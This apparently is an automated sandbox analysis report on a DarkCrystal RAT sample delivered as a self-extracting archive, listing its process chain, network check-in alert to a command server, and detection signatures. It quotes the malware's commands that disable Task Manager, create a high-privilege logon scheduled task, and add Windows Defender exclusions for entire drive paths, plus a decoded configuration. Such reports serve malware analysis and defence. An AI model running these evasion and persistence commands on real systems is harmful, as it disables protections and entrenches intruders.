                        Source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-LbnYnrAFsRBRgFiNODVy","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                        Source: KzLetzDiM8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\86b7f9ef8ac2e1Jump to behavior
                        Source: KzLetzDiM8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: KzLetzDiM8.exe
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.pdb source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.000000000301B000.00000004.00000800.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Infects executable files (exe, dll, sys, html)
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001EA69B
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001FC220
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49804 -> 37.44.238.250:80
                        Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester

                        System Summary

                        barindex
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_001E6FAA
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMPJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMPJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001E848E0_2_001E848E
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F6CDC0_2_001F6CDC
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F40880_2_001F4088
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F00B70_2_001F00B7
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001E40FE0_2_001E40FE
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F71530_2_001F7153
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_002051C90_2_002051C9
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F62CA0_2_001F62CA
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001E32F70_2_001E32F7
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F43BF0_2_001F43BF
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EC4260_2_001EC426
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_0020D4400_2_0020D440
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EF4610_2_001EF461
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F77EF0_2_001F77EF
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001E286B0_2_001E286B
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_0020D8EE0_2_0020D8EE
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EE9B70_2_001EE9B7
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_002119F40_2_002119F4
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001F3E0B0_2_001F3E0B
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_00204F9A0_2_00204F9A
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EEFE20_2_001EEFE2
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeCode function: 8_2_00007FFD9BAB0D488_2_00007FFD9BAB0D48
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeCode function: 8_2_00007FFD9BAB0E438_2_00007FFD9BAB0E43
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeCode function: 8_2_00007FFD9BEB13958_2_00007FFD9BEB1395
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeCode function: 81_2_00007FFD9BAA0D4881_2_00007FFD9BAA0D48
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeCode function: 81_2_00007FFD9BAA0E4381_2_00007FFD9BAA0E43
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AdxdALuR.log DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: String function: 001FEB78 appears 39 times
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: String function: 001FEC50 appears 56 times
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: String function: 001FF5F0 appears 31 times
                        Source: izOFSTgA.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: KzLetzDiM8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: ComComponentDriverInto.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: OXiaaPzsOIsoqrAHYxAVs.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: sihost.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ComComponentDriverInto.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: WmiPrvSE.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@89/107@0/0
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001E6C74 GetLastError,FormatMessageW,0_2_001E6C74
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_001FA6C2
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\izOFSTgA.logJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-LbnYnrAFsRBRgFiNODVy
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\AppData\Local\Temp\l4lihvv4Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCommand line argument: sfxname0_2_001FDF1E
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCommand line argument: sfxstime0_2_001FDF1E
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCommand line argument: STARTDLG0_2_001FDF1E
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCommand line argument: xz#0_2_001FDF1E
                        Source: KzLetzDiM8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeFile read: C:\Windows\win.iniJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: KzLetzDiM8.exeVirustotal: Detection: 51%
                        Source: KzLetzDiM8.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeFile read: C:\Users\user\Desktop\KzLetzDiM8.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\KzLetzDiM8.exe "C:\Users\user\Desktop\KzLetzDiM8.exe"
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\fontdriversavescrt\ComComponentDriverInto.exe "C:\fontdriversavescrt/ComComponentDriverInto.exe"
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"
                        Source: unknownProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f
                        Source: unknownProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
